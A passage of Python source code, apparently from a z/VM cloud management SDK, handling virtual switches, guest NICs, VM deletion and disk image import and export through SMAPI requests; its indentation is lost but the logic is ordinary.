with zvmutils.expect_invalid_resp_data():
if (not result['response'] or not result['response'][0]):
return []
else:
data = '\n'.join([s for s in result['response']
if isinstance(s, six.string_types)])
output = re.findall('VSWITCH: Name: (.*)', data)
return output
def set_vswitch_port_vlan_id(self, vswitch_name, userid, vlan_id):
smt_userid = zvmutils.get_smt_userid()
msg = ('Start to set VLAN ID %(vid)s on vswitch %(vsw)s '
'for guest %(vm)s'
% {'vid': vlan_id, 'vsw': vswitch_name, 'vm': userid})
LOG.info(msg)
rd = ' '.join((
"SMAPI %s API Virtual_Network_Vswitch_Set_Extended" %
smt_userid,
"--operands",
"-k grant_userid=%s" % userid,
"-k switch_name=%s" % vswitch_name,
"-k user_vlan_id=%s" % vlan_id,
"-k persist=YES"))
try:
self._request(rd)
except exception.SDKSMTRequestFailed as err:
LOG.error("Failed to set VLAN ID %s on vswitch %s for user %s, "
"error: %s" %
(vlan_id, vswitch_name, userid, err.format_message()))
self._set_vswitch_exception(err, vswitch_name)
msg = ('Set VLAN ID %(vid)s on vswitch %(vsw)s '
'for guest %(vm)s successfully'
% {'vid': vlan_id, 'vsw': vswitch_name, 'vm': userid})
LOG.info(msg)
def add_vswitch(self, name, rdev=None, controller='*',
connection='CONNECT', network_type='ETHERNET',
router="NONROUTER", vid='UNAWARE', port_type='ACCESS',
gvrp='GVRP', queue_mem=8, native_vid=1, persist=True):
smt_userid = zvmutils.get_smt_userid()
msg = ('Start to create vswitch %s' % name)
LOG.info(msg)
rd = ' '.join((
"SMAPI %s API Virtual_Network_Vswitch_Create_Extended" %
smt_userid,
"--operands",
'-k switch_name=%s' % name))
if rdev is not None:
rd += " -k real_device_address" +\
"=\'%s\'" % rdev.replace(',', ' ')
if controller != '*':
rd += " -k controller_name=%s" % controller
rd = ' '.join((rd,
"-k connection_value=%s" % connection,
"-k queue_memory_limit=%s" % queue_mem,
"-k transport_type=%s" % network_type,
"-k vlan_id=%s" % vid,
"-k persist=%s" % (persist and 'YES' or 'NO')))
# Only if vswitch is vlan awared, port_type, gvrp and native_vid are
# allowed to specified
if isinstance(vid, int) or vid.upper() != 'UNAWARE':
rd = ' '.join((rd,
"-k port_type=%s" % port_type,
"-k gvrp_value=%s" % gvrp,
"-k native_vlanid=%s" % native_vid))
if router is not None:
rd += " -k routing_value=%s" % router
msg = ('Start to create vswitch %s' % name)
LOG.info(msg)
try:
self._request(rd)
except exception.SDKSMTRequestFailed as err:
LOG.error("Failed to create vswitch %s, error: %s" %
(name, err.format_message()))
raise
msg = ('Create vswitch %s successfully' % name)
LOG.info(msg)
def set_vswitch(self, switch_name, **kwargs):
"""Set vswitch"""
smt_userid = zvmutils.get_smt_userid()
rd = ' '.join((
"SMAPI %s API Virtual_Network_Vswitch_Set_Extended" %
smt_userid,
"--operands",
"-k switch_name=%s" % switch_name))
for k, v in kwargs.items():
rd = ' '.join((rd,
"-k %(key)s=\'%(value)s\'" %
{'key': k, 'value': v}))
try:
self._request(rd)
except exception.SDKSMTRequestFailed as err:
LOG.error("Failed to set vswitch %s, error: %s" %
(switch_name, err.format_message()))
self._set_vswitch_exception(err, switch_name)
def delete_vswitch(self, switch_name, persist=True):
smt_userid = zvmutils.get_smt_userid()
msg = ('Start to delete vswitch %s' % switch_name)
LOG.info(msg)
rd = ' '.join((
"SMAPI %s API Virtual_Network_Vswitch_Delete_Extended" %
smt_userid,
"--operands",
"-k switch_name=%s" % switch_name,
"-k persist=%s" % (persist and 'YES' or 'NO')))
try:
self._request(rd)
except exception.SDKSMTRequestFailed as err:
results = err.results
if ((results['rc'] == 212) and
(results['rs'] == 40)):
LOG.warning("Vswitch %s does not exist", switch_name)
return
else:
LOG.error("Failed to delete vswitch %s, error: %s" %
(switch_name, err.format_message()))
raise
msg = ('Delete vswitch %s successfully' % switch_name)
LOG.info(msg)
def create_nic(self, userid, vdev=None, nic_id=None,
mac_addr=None, active=False):
nic_vdev = self._get_available_vdev(userid, vdev=vdev)
LOG.debug('Nic attributes: vdev is %(vdev)s, '
'ID is %(id)s, address is %(address)s',
{'vdev': nic_vdev,
'id': nic_id or 'not specified',
'address': mac_addr or 'not specified'})
self._create_nic(userid, nic_vdev, nic_id=nic_id,
mac_addr=mac_addr, active=active)
return nic_vdev
def _create_nic_inactive_exception(self, error, userid, vdev):
if ((error.results['rc'] == 400) and (error.results['rs'] == 12)):
obj_desc = "Guest %s" % userid
raise exception.SDKConflictError(modID='network', rs=7,
vdev=vdev, userid=userid,
obj=obj_desc)
elif ((error.results['rc'] == 404) and (error.results['rs'] == 12)):
obj_desc = "Guest device %s" % vdev
raise exception.SDKConflictError(modID='network', rs=7,
vdev=vdev, userid=userid,
obj=obj_desc)
elif ((error.results['rc'] == 404) and (error.results['rs'] == 4)):
errmsg = error.format_message()
raise exception.SDKConflictError(modID='network', rs=6,
vdev=vdev, userid=userid,
msg=errmsg)
else:
raise error
def _create_nic_active_exception(self, error, userid, vdev):
if (((error.results['rc'] == 204) and (error.results['rs'] == 4)) or
((error.results['rc'] == 204) and (error.results['rs'] == 28))):
errmsg = error.format_message()
raise exception.SDKConflictError(modID='network', rs=6,
vdev=vdev, userid=userid,
msg=errmsg)
elif ((error.results['rc'] == 396) and
(error.results['rs'] == 2797)):
errmsg = error.format_message()
raise exception.SDKConflictError(modID='network', rs=6,
vdev=vdev, userid=userid,
msg=errmsg)
else:
raise error
def _is_active(self, userid):
# Get the vm status
power_state = self.get_power_state(userid)
if power_state == 'off':
LOG.error('The vm %s is powered off, '
'active operation is not allowed' % userid)
raise exception.SDKConflictError(modID='network', rs=1,
userid=userid)
def _create_nic(self, userid, vdev, nic_id=None, mac_addr=None,
active=False):
if active:
self._is_active(userid)
msg = ('Start to create nic device %(vdev)s for guest %(vm)s'
% {'vdev': vdev, 'vm': userid})
LOG.info(msg)
requestData = ' '.join((
'SMAPI %s API Virtual_Network_Adapter_Create_Extended_DM' %
userid,
"--operands",
"-k image_device_number=%s" % vdev,
"-k adapter_type=QDIO"))
if mac_addr is not None:
mac = ''.join(mac_addr.split(':'))[6:]
requestData += ' -k mac_id=%s' % mac
retry = 1
for secs in [1, 3, 5, 8, -1]:
try:
self._request(requestData)
break
except exception.SDKSMTRequestFailed as err:
if (err.results['rc'] == 400 and
err.results['rs'] == 12 and
retry < 5):
LOG.info("The VM is locked, will retry")
time.sleep(secs)
retry += 1
else:
LOG.error("Failed to create nic %s for user %s in "
"the guest's user direct, error: %s" %
(vdev, userid, err.format_message()))
self._create_nic_inactive_exception(err, userid, vdev)
if active:
if mac_addr is not None:
LOG.warning("Ignore the mac address %s when "
"adding nic on an active system" % mac_addr)
requestData = ' '.join((
'SMAPI %s API Virtual_Network_Adapter_Create_Extended' %
userid,
"--operands",
"-k image_device_number=%s" % vdev,
"-k adapter_type=QDIO"))
try:
self._request(requestData)
except (exception.SDKSMTRequestFailed,
exception.SDKInternalError) as err1:
msg1 = err1.format_message()
persist_OK = True
requestData = ' '.join((
'SMAPI %s API Virtual_Network_Adapter_Delete_DM' % userid,
"--operands",
'-v %s' % vdev))
try:
self._request(requestData)
except (exception.SDKSMTRequestFailed,
exception.SDKInternalError) as err2:
results = err2.results
msg2 = err2.format_message()
if ((results['rc'] == 404) and
(results['rs'] == 8)):
persist_OK = True
else:
persist_OK = False
if persist_OK:
self._create_nic_active_exception(err1, userid, vdev)
else:
raise exception.SDKNetworkOperationError(rs=4,
nic=vdev, userid=userid,
create_err=msg1, revoke_err=msg2)
self._NetDbOperator.switch_add_record(userid, vdev, port=nic_id)
msg = ('Create nic device %(vdev)s for guest %(vm)s successfully'
% {'vdev': vdev, 'vm': userid})
LOG.info(msg)
def get_user_direct(self, userid):
with zvmutils.log_and_reraise_smt_request_failed():
results = self._request("getvm %s directory" % userid)
return results.get('response', [])
def get_all_user_direct(self):
with zvmutils.log_and_reraise_smt_request_failed():
results = self._request("getvm alldirectory")
return results.get('response', [])
def get_diskpool_volumes(self, pool):
with zvmutils.log_and_reraise_smt_request_failed():
results = self._request("gethost diskpoolvolumes %s" % pool)
diskpool_volumes = zvmutils.translate_response_to_dict(
'\n'.join(results['response']), const.DISKPOOL_VOLUME_KEYWORDS)
return diskpool_volumes
def get_volume_info(self):
with zvmutils.log_and_reraise_smt_request_failed():
results = self._request("gethost volumeinfo")
with zvmutils.expect_invalid_resp_data(results):
volume_info = zvmutils.translate_response_data_to_expect_dict(
results['response'], 3)
return volume_info
def _delete_nic_active_exception(self, error, userid, vdev):
if ((error.results['rc'] == 204) and (error.results['rs'] == 28)):
errmsg = error.format_message()
raise exception.SDKConflictError(modID='network', rs=8,
vdev=vdev, userid=userid,
msg=errmsg)
else:
raise error
def _delete_nic_inactive_exception(self, error, userid, vdev):
if ((error.results['rc'] == 400) and (error.results['rs'] == 12)):
obj_desc = "Guest %s" % userid
raise exception.SDKConflictError(modID='network', rs=9,
vdev=vdev, userid=userid,
obj=obj_desc)
else:
raise error
def delete_nic(self, userid, vdev, active=False):
if active:
self._is_active(userid)
vdev_exist = False
nic_list = self._NetDbOperator.switch_select_record_for_userid(userid)
for p in nic_list:
if (int(p['interface'], 16) == int(vdev, 16)):
vdev_exist = True
vdev_info = p
break
if not vdev_exist:
# Device has already be removed from user direct
LOG.warning("Virtual device %s does not exist in the switch table",
vdev)
if active:
try:
resp = self.execute_cmd(userid, 'vmcp q %s' % vdev)
nic_info = "%s ON NIC" % vdev.zfill(4).upper()
osa_info = "%s ON OSA" % vdev.zfill(4).upper()
if nic_info in resp[0]:
pass
elif osa_info in resp[0]:
self._undedicate_nic(userid, vdev, active=active,
del_active_only=True)
return
else:
LOG.warning("Device %s of guest %s is not "
"network adapter" % (vdev, userid))
return
except exception.SDKSMTRequestFailed as err:
emsg = err.format_message()
ignored_msg = ('Device %s does not exist'
% vdev.zfill(4).upper())
if (emsg.__contains__(ignored_msg)):
LOG.warning("Virtual device %s does not exist for "
"active guest %s" % (vdev, userid))
return
else:
raise
else:
return
else:
# Device hasnot be removed from user direct,
# check whether it is related to a dedicated OSA device
if ((vdev_info["comments"] is not None) and
(vdev_info["comments"].__contains__('OSA='))):
self._undedicate_nic(userid, vdev, active=active)
return
msg = ('Start to delete nic device %(vdev)s for guest %(vm)s'
% {'vdev': vdev, 'vm': userid})
LOG.info(msg)
if vdev_exist:
rd = ' '.join((
"SMAPI %s API Virtual_Network_Adapter_Delete_DM" %
userid,
"--operands",
'-v %s' % vdev))
try:
self._request(rd)
except exception.SDKSMTRequestFailed as err:
results = err.results
emsg = err.format_message()
if ((results['rc'] == 404) and
(results['rs'] == 8)):
LOG.warning("Virtual device %s does not exist in "
"the guest's user direct", vdev)
else:
LOG.error("Failed to delete nic %s for %s in "
"the guest's user direct, error: %s" %
(vdev, userid, emsg))
self._delete_nic_inactive_exception(err, userid, vdev)
self._NetDbOperator.switch_delete_record_for_nic(userid, vdev)
if active:
rd = ' '.join((
"SMAPI %s API Virtual_Network_Adapter_Delete" %
userid,
"--operands",
'-v %s' % vdev))
try:
self._request(rd)
except exception.SDKSMTRequestFailed as err:
results = err.results
emsg = err.format_message()
if ((results['rc'] == 204) and
(results['rs'] == 8)):
LOG.warning("Virtual device %s does not exist on "
"the active guest system", vdev)
else:
LOG.error("Failed to delete nic %s for %s on "
"the active guest system, error: %s" %
(vdev, userid, emsg))
self._delete_nic_active_exception(err, userid, vdev)
msg = ('Delete nic device %(vdev)s for guest %(vm)s successfully'
% {'vdev': vdev, 'vm': userid})
LOG.info(msg)
def _couple_active_exception(self, error, userid, vdev, vswitch):
if ((error.results['rc'] == 212) and
((error.results['rs'] == 28) or
(error.results['rs'] == 8))):
errmsg = error.format_message()
raise exception.SDKConflictError(modID='network', rs=10,
vdev=vdev, userid=userid,
vsw=vswitch,
msg=errmsg)
elif ((error.results['rc'] == 212) and (error.results['rs'] == 40)):
obj_desc = "Vswitch %s" % vswitch
raise exception.SDKObjectNotExistError(obj_desc=obj_desc,
modID='network')
elif ((error.results['rc'] == 204) and (error.results['rs'] == 8)):
obj_desc = "Guest device %s" % vdev
raise exception.SDKObjectNotExistError(obj_desc=obj_desc,
modID='network')
elif ((error.results['rc'] == 396) and
((error.results['rs'] == 2788) or
(error.results['rs'] == 2848) or
(error.results['rs'] == 3034) or
(error.results['rs'] == 6011))):
errmsg = error.format_message()
raise exception.SDKConflictError(modID='network', rs=10,
vdev=vdev, userid=userid,
vsw=vswitch,
msg=errmsg)
else:
raise error
def _couple_inactive_exception(self, error, userid, vdev, vswitch):
if ((error.results['rc'] == 412) and (error.results['rs'] == 28)):
errmsg = error.format_message()
raise exception.SDKConflictError(modID='network', rs=10,
vdev=vdev, userid=userid,
vsw=vswitch,
msg=errmsg)
elif ((error.results['rc'] == 400) and (error.results['rs'] == 12)):
obj_desc = "Guest %s" % userid
raise exception.SDKConflictError(modID='network', rs=11,
vdev=vdev, userid=userid,
vsw=vswitch,
obj=obj_desc)
elif ((error.results['rc'] == 400) and (error.results['rs'] == 4)):
obj_desc = "Guest %s" % vdev
raise exception.SDKObjectNotExistError(obj_desc=obj_desc,
modID='network')
elif ((error.results['rc'] == 404) and (error.results['rs'] == 12)):
obj_desc = "Guest device %s" % vdev
raise exception.SDKConflictError(modID='network', rs=11,
vdev=vdev, userid=userid,
vsw=vswitch,
obj=obj_desc)
elif ((error.results['rc'] == 404) and (error.results['rs'] == 8)):
obj_desc = "Guest device %s" % vdev
raise exception.SDKObjectNotExistError(obj_desc=obj_desc,
modID='network')
else:
raise error
def _couple_nic(self, userid, vdev, vswitch_name,
active=False):
"""Couple NIC to vswitch by adding vswitch into user direct."""
if active:
self._is_active(userid)
requestData = ' '.join((
'SMAPI %s' % userid,
'API Virtual_Network_Adapter_Connect_Vswitch',
"--operands",
"-v %s" % vdev,
"-n %s" % vswitch_name))
try:
self._request(requestData)
except (exception.SDKSMTRequestFailed,
exception.SDKInternalError) as err1:
results1 = err1.results
msg1 = err1.format_message()
if ((results1 is not None) and
(results1['rc'] == 204) and
(results1['rs'] == 20)):
LOG.warning("Virtual device %s already connected "
"on the active guest system", vdev)
else:
persist_OK = True
requestData = ' '.join((
'SMAPI %s' % userid,
'API Virtual_Network_Adapter_Disconnect_DM',
"--operands",
'-v %s' % vdev))
try:
self._request(requestData)
except (exception.SDKSMTRequestFailed,
exception.SDKInternalError) as err2:
results2 = err2.results
msg2 = err2.format_message()
if ((results2 is not None) and
(results2['rc'] == 212) and
(results2['rs'] == 32)):
persist_OK = True
else:
persist_OK = False
if persist_OK:
self._couple_active_exception(err1, userid, vdev,
vswitch_name)
else:
raise exception.SDKNetworkOperationError(rs=3,
nic=vdev, vswitch=vswitch_name,
couple_err=msg1, revoke_err=msg2)
"""Update information in switch table."""
self._NetDbOperator.switch_update_record_with_switch(userid, vdev,
vswitch_name)
msg = ('Couple nic device %(vdev)s of guest %(vm)s '
'with vswitch %(vsw)s successfully'
% {'vdev': vdev, 'vm': userid, 'vsw': vswitch_name})
LOG.info(msg)
def couple_nic_to_vswitch(self, userid, nic_vdev,
vswitch_name, active=False, vlan_id=-1):
"""Couple nic to vswitch."""
if active:
msg = ("both in the user direct of guest %s and on "
"the active guest system" % userid)
else:
msg = "in the user direct of guest %s" % userid
LOG.debug("Connect nic %s to switch %s %s",
nic_vdev, vswitch_name, msg)
# previously we use Virtual_Network_Adapter_Connect_Vswitch_DM
# but due to limitation in SMAPI, we have to create such user
# direct by our own due to no way to add VLAN ID
msg = ('Start to couple nic device %(vdev)s of guest %(vm)s '
'with vswitch %(vsw)s with vlan %(vlan_id)s:'
% {'vdev': nic_vdev, 'vm': userid, 'vsw': vswitch_name,
'vlan_id': vlan_id})
LOG.info(msg)
user_direct = self.get_user_direct(userid)
new_user_direct = []
nicdef = "NICDEF %s" % nic_vdev
for ent in user_direct:
if len(ent) > 0:
new_user_direct.append(ent)
if ent.upper().startswith(nicdef):
# vlan_id < 0 means no VLAN ID given
v = nicdef
if vlan_id < 0:
v += " LAN SYSTEM %s" % vswitch_name
else:
v += " LAN SYSTEM %s VLAN %s" % (vswitch_name, vlan_id)
new_user_direct.append(v)
try:
self._lock_user_direct(userid)
except exception.SDKSMTRequestFailed as e:
raise exception.SDKGuestOperationError(rs=9, userid=userid,
err=e.format_message())
# Replace user directory
try:
self._replace_user_direct(userid, new_user_direct)
except exception.SDKSMTRequestFailed as e:
rd = ("SMAPI %s API Image_Unlock_DM " % userid)
try:
self._request(rd)
except exception.SDKSMTRequestFailed as err2:
# ignore 'not locked' error
if ((err2.results['rc'] == 400) and (
err2.results['rs'] == 24)):
LOG.debug("Guest '%s' unlocked successfully." % userid)
pass
else:
# just print error and ignore this unlock error
msg = ("Unlock definition of guest '%s' failed "
"with SMT error: %s" %
(userid, err2.format_message()))
LOG.error(msg)
raise exception.SDKGuestOperationError(rs=10,
userid=userid,
err=e.format_message())
self._couple_nic(userid, nic_vdev, vswitch_name, active=active)
def _uncouple_active_exception(self, error, userid, vdev):
if ((error.results['rc'] == 204) and (error.results['rs'] == 8)):
obj_desc = "Guest device %s" % vdev
raise exception.SDKObjectNotExistError(obj_desc=obj_desc,
modID='network')
elif ((error.results['rc'] == 204) and (error.results['rs'] == 28)):
errmsg = error.format_message()
raise exception.SDKConflictError(modID='network', rs=12,
vdev=vdev, userid=userid,
msg=errmsg)
else:
raise error
def _uncouple_inactive_exception(self, error, userid, vdev):
if ((error.results['rc'] == 404) and (error.results['rs'] == 8)):
obj_desc = "Guest device %s" % vdev
raise exception.SDKObjectNotExistError(obj_desc=obj_desc,
modID='network')
elif ((error.results['rc'] == 400) and (error.results['rs'] == 4)):
obj_desc = "Guest %s" % vdev
raise exception.SDKObjectNotExistError(obj_desc=obj_desc,
modID='network')
elif ((error.results['rc'] == 400) and (error.results['rs'] == 12)):
obj_desc = "Guest %s" % userid
raise exception.SDKConflictError(modID='network', rs=13,
vdev=vdev, userid=userid,
obj=obj_desc)
else:
raise error
def _uncouple_nic(self, userid, vdev, active=False):
"""Uncouple NIC from vswitch"""
if active:
self._is_active(userid)
msg = ('Start to uncouple nic device %(vdev)s of guest %(vm)s'
% {'vdev': vdev, 'vm': userid})
LOG.info(msg)
requestData = ' '.join((
'SMAPI %s' % userid,
"API Virtual_Network_Adapter_Disconnect_DM",
"--operands",
"-v %s" % vdev))
try:
self._request(requestData)
except (exception.SDKSMTRequestFailed,
exception.SDKInternalError) as err:
results = err.results
emsg = err.format_message()
if ((results is not None) and
(results['rc'] == 212) and
(results['rs'] == 32)):
LOG.warning("Virtual device %s is already disconnected "
"in the guest's user direct", vdev)
else:
LOG.error("Failed to uncouple nic %s in the guest's user "
"direct, error: %s" % (vdev, emsg))
self._uncouple_inactive_exception(err, userid, vdev)
"""Update information in switch table."""
self._NetDbOperator.switch_update_record_with_switch(userid, vdev,
None)
# the inst must be active, or this call will failed
if active:
requestData = ' '.join((
'SMAPI %s' % userid,
'API Virtual_Network_Adapter_Disconnect',
"--operands",
"-v %s" % vdev))
try:
self._request(requestData)
except (exception.SDKSMTRequestFailed,
exception.SDKInternalError) as err:
results = err.results
emsg = err.format_message()
if ((results is not None) and
(results['rc'] == 204) and
(results['rs'] == 48)):
LOG.warning("Virtual device %s is already "
"disconnected on the active "
"guest system", vdev)
else:
LOG.error("Failed to uncouple nic %s on the active "
"guest system, error: %s" % (vdev, emsg))
self._uncouple_active_exception(err, userid, vdev)
msg = ('Uncouple nic device %(vdev)s of guest %(vm)s successfully'
% {'vdev': vdev, 'vm': userid})
LOG.info(msg)
def uncouple_nic_from_vswitch(self, userid, nic_vdev,
active=False):
if active:
msg = ("both in the user direct of guest %s and on "
"the active guest system" % userid)
else:
msg = "in the user direct of guest %s" % userid
LOG.debug("Disconnect nic %s with network %s",
nic_vdev, msg)
self._uncouple_nic(userid, nic_vdev, active=active)
def delete_userid(self, userid):
rd = ' '.join(('deletevm', userid, 'directory'))
try:
self._request(rd)
except exception.SDKSMTRequestFailed as err:
if err.results['rc'] == 400 and err.results['rs'] == 4:
# guest vm definition not found
LOG.debug("The guest %s does not exist." % userid)
return
# ingore delete VM not finished error
if err.results['rc'] == 596 and err.results['rs'] == 6831:
# 596/6831 means delete VM not finished yet
LOG.warning("The guest %s deleted with 596/6831" % userid)
return
# ignore delete VM with VDISK format error
# DirMaint does not support formatting TDISK or VDISK extents.
if err.results['rc'] == 596 and err.results['rs'] == 3543:
LOG.debug("The guest %s deleted with 596/3543" % userid)
return
# The CP or CMS command shown resulted in a non-zero
# return code. This message is frequently preceded by
# a DMK, HCP, or DMS error message that describes the cause
# https://www-01.ibm.com/servers/resourcelink/svc0302a.nsf/
# pages/zVMV7R2gc246282/$file/hcpk2_v7r2.pdf
if err.results['rc'] == 596 and err.results['rs'] == 2119:
LOG.debug("The guest %s deleted with 596/2119" % userid)
return
msg = "SMT error: %s" % err.format_message()
raise exception.SDKSMTRequestFailed(err.results, msg)
def delete_vm(self, userid):
self.delete_userid(userid)
# remove userid from smapi namelist
self.namelist_remove(zvmutils.get_namelist(), userid)
# revoke userid from vswitch
action = "revoke id %s authority from vswitch" % userid
with zvmutils.log_and_reraise_sdkbase_error(action):
switch_info = self._NetDbOperator.switch_select_record_for_userid(
userid)
switch_list = set()
for item in switch_info:
switch_list.add(item['switch'])
for item in switch_list:
if item is not None:
self.revoke_user_from_vswitch(item, userid)
# cleanup db record from network table
action = "delete network record for user %s" % userid
with zvmutils.log_and_reraise_sdkbase_error(action):
self._NetDbOperator.switch_delete_record_for_userid(userid)
# TODO: cleanup db record from volume table
pass
# cleanup persistent folder for guest
self._pathutils.remove_guest_path(userid)
# cleanup db record from guest table
action = "delete guest %s from database" % userid
with zvmutils.log_and_reraise_sdkbase_error(action):
self._GuestDbOperator.delete_guest_by_userid(userid)
def execute_cmd(self, userid, cmdStr):
""""cmdVM."""
requestData = 'cmdVM ' + userid + ' CMD \'' + cmdStr + '\''
with zvmutils.log_and_reraise_smt_request_failed(action='execute '
'command on vm via iucv channel'):
results = self._request(requestData)
ret = results['response']
return ret
def execute_cmd_direct(self, userid, cmdStr):
""""cmdVM."""
requestData = 'cmdVM ' + userid + ' CMD \'' + cmdStr + '\''
results = self._smt.request(requestData)
return results
def image_import(self, image_name, url, image_meta, remote_host=None):
"""Import the image specified in url to SDK image repository, and
create a record in image db, the imported images are located in
image_repository/prov_method/os_version/image_name/, for example,
/opt/sdk/images/netboot/rhel7.2/90685d2b-167bimage/0100"""
image_info = []
try:
image_info = self._ImageDbOperator.image_query_record(image_name)
except exception.SDKObjectNotExistError:
msg = ("The image record %s doens't exist in SDK image datebase,"
" will import the image and create record now" % image_name)
LOG.info(msg)
# Ensure the specified image is not exist in image DB
if image_info:
msg = ("The image name %s has already exist in SDK image "
"database, please check if they are same image or consider"
" to use a different image name for import" % image_name)
LOG.error(msg)
raise exception.SDKImageOperationError(rs=13, img=image_name)
try:
image_os_version = image_meta['os_version'].lower()
target_folder = self._pathutils.create_import_image_repository(
image_os_version, const.IMAGE_TYPE['DEPLOY'],
image_name)
except Exception as err:
msg = ('Failed to create repository to store image %(img)s with '
'error: %(err)s, please make sure there are enough space '
'on zvmsdk server and proper permission to create the '
'repository' % {'img': image_name,
'err': six.text_type(err)})
LOG.error(msg)
raise exception.SDKImageOperationError(rs=14, msg=msg)
if self.is_rhcos(image_os_version):
image_disk_type = image_meta.get('disk_type')
if ((image_disk_type is None) or
((image_disk_type.upper() != "DASD" and
image_disk_type.upper() != "SCSI"))):
msg = ('Disk type is required for RHCOS image import, '
'the value should be DASD or SCSI')
LOG.error(msg)
raise exception.SDKImageOperationError(rs=14, msg=msg)
else:
comments = {'disk_type': image_disk_type.upper()}
comments = str(comments)
else:
comments = None
try:
import_image_fn = urlparse.urlparse(url).path.split('/')[-1]
import_image_fpath = '/'.join([target_folder, import_image_fn])
self._scheme2backend(urlparse.urlparse(url).scheme).image_import(
image_name, url,
import_image_fpath,
remote_host=remote_host)
# Check md5 after import to ensure import a correct image
# TODO change to use query image name in DB
expect_md5sum = image_meta.get('md5sum')
real_md5sum = self._get_md5sum(import_image_fpath)
if expect_md5sum and expect_md5sum != real_md5sum:
msg = ("The md5sum after import is not same as source image,"
" the image has been broken")
LOG.error(msg)
raise exception.SDKImageOperationError(rs=4)
# After import to image repository, figure out the image type is
# single disk image or multiple-disk image,if multiple disks image,
# extract it, if it's single image, rename its name to be same as
# specific vdev
# TODO: (nafei) use sub-function to check the image type
image_type = 'rootonly'
if image_type == 'rootonly':
final_image_fpath = '/'.join([target_folder,
CONF.zvm.user_root_vdev])
os.rename(import_image_fpath, final_image_fpath)
elif image_type == 'alldisks':
# For multiple disks image, extract it, after extract, the
# content under image folder is like: 0100, 0101, 0102
# and remove the image file 0100-0101-0102.tgz
pass
# TODO: put multiple disk image into consideration, update the
# disk_size_units and image_size db field
if not self.is_rhcos(image_os_version):
disk_size_units = self._get_disk_size_units(final_image_fpath)
else:
disk_size_units = self._get_disk_size_units_rhcos(
final_image_fpath)
image_size = self._get_image_size(final_image_fpath)
# TODO: update the real_md5sum field to include each disk image
self._ImageDbOperator.image_add_record(image_name,
image_os_version,
real_md5sum,
disk_size_units,
image_size,
image_type,
comments=comments)
LOG.info("Image %s is import successfully" % image_name)
except Exception:
# Cleanup the image from image repository
self._pathutils.clean_temp_folder(target_folder)
raise
def image_export(self, image_name, dest_url, remote_host=None):
"""Export the specific image to remote host or local file system
:param image_name: image name that can be uniquely identify an image
:param dest_path: the location to store exported image, eg.
/opt/images, the image will be stored in folder
/opt/images/
:param remote_host: the server that export image to, the format is
username@IP eg. [email protected], if remote_host is
None, it means the image will be stored in local server
:returns a dictionary that contains the exported image info
{
'image_name': the image_name that exported
'image_path': the image_path after exported
'os_version': the os version of the exported image
'md5sum': the md5sum of the original image
'comments': the comments of the original image
}
"""
image_info = self._ImageDbOperator.image_query_record(image_name)
if not image_info:
msg = ("The image %s does not exist in image repository"
% image_name)
LOG.error(msg)
raise exception.SDKImageOperationError(rs=20, img=image_name)
image_type = image_info[0]['type']
# TODO: (nafei) according to image_type, detect image exported path
# For multiple disk image, make the tgz firstly, the specify the
# source_path to be something like: 0100-0101-0102.tgz
if image_type == 'rootonly':
source_path = '/'.join([CONF.image.sdk_image_repository,
const.IMAGE_TYPE['DEPLOY'],
image_info[0]['imageosdistro'],
image_name,
CONF.zvm.user_root_vdev])
else:
pass
self._scheme2backend(urlparse.urlparse(dest_url).scheme).image_export(
source_path, dest_url,
remote_host=remote_host)
# TODO: (nafei) for multiple disks image, update the expect_dict
# to be the tgz's md5sum
export_dict = {'image_name': image_name,
'image_path': dest_url,
'os_version': image_info[0]['imageosdistro'],
'md5sum': image_info[0]['md5sum'],
'comments': image_info[0]['comments']}
LOG.info("Image %s export successfully" % image_name)
return export_dict
def _get_image_disk_size_units(self, image_path):
""" Return a comma separated string to indicate the image disk size
and units for each image disk file under image_path
For single disk image , it looks like: 0100=3338:CYL
For multiple disk image, it looks like:
0100=3338:CYL,0101=4194200:BLK, 0102=4370:CYL"""
pass
def _get_disk_size_units(self, image_path):
command = 'hexdump -n 48 -C %s' % image_path
(rc, output) = zvmutils.execute(command)
LOG.debug("hexdump result is %s" % output)
if rc:
msg = ("Error happened when executing command hexdump with"
"reason: %s" % output)
LOG.error(msg)
raise exception.SDKImageOperationError(rs=5)
try:
root_disk_size = int(output[144:156])
disk_units = output[220:223]
root_disk_units = ':'.join([str(root_disk_size), disk_units])
except ValueError:
msg = ("Image file at %s is missing built-in disk size "
"metadata, it was probably not captured by SDK" %
image_path)
LOG.error(msg)
raise exception.SDKImageOperationError(rs=6)
if 'FBA' not in output and 'CKD' not in output:
raise exception.SDKImageOperationError(rs=7)
LOG.debug("The image's root_disk_units is %s" % root_disk_units)
return root_disk_units
def _get_disk_size_units_rhcos(self, image_path):
command = "fdisk -b 4096 -l %s | head -2 | awk '{print $5}'" % (
image_path)
rc = 0
output = ""
try:
# shell should be set True because it is a shell command with
# pipeline, so can not use utils.execute function here
output = subprocess.check_output(command, shell=True,
stderr=subprocess.STDOUT)
output = bytes.decode(output)
except subprocess.CalledProcessError as err:
rc = err.returncode
output = err.output
except Exception as err:
err_msg = ('Command "%s" Error: %s' % (' '.join(command),
str(err)))
raise exception.SDKInternalError(msg=err_msg)
if rc or output.strip('1234567890*\n'):
msg = ("Error happened when executing command fdisk with "
"reason: %s" % output)
LOG.error(msg)
raise exception.SDKImageOperationError(rs=8)
image_size = output.split()[0]
try:
cyl = (float(image_size)) / 737280
cyl = str(int(math.ceil(cyl)))
except Exception:
msg = ("Failed to convert %s to a number of cylinders."
% image_size)
LOG.error(msg)
raise exception.SDKImageOperationError(rs=14, msg=msg)
disk_units = "CYL"
root_disk_units = ':'.join([str(cyl), disk_units])
LOG.debug("The image's root_disk_units is %s" % root_disk_units)
return root_disk_units
def _get_image_size(self, image_path):
"""Return disk size in bytes"""
command = 'du -b %s' % image_path
(rc, output) = zvmutils.execute(command)
if rc:
msg = ("Error happened when executing command du -b with"
"reason: %s" % output)
LOG.error(msg)
raise exception.SDKImageOperationError(rs=8)
size = output.split()[0]
return size
def _get_image_path_by_name(self, image_name):
try:
target_info = self._ImageDbOperator.image_query_record(image_name)
except exception.SDKObjectNotExistError:
msg = ("The image %s does not exist in image repository"
% image_name)
LOG.error(msg)
raise exception.SDKImageOperationError(rs=20, img=image_name)
# TODO: (nafei) Handle multiple disks image deploy
image_path = '/'.join([CONF.image.sdk_image_repository,
const.IMAGE_TYPE['DEPLOY'],
target_info[0]['imageosdistro'],
image_name])
return image_path
def _scheme2backend(self, scheme):
try:
return {
"file": FilesystemBackend,
"http": HTTPBackend,
# "https": HTTPSBackend
}[scheme]
except KeyError:
msg = ("No backend found for '%s'" % scheme)
LOG.error(msg)
raise exception.SDKImageOperationError(rs=2, schema=scheme)
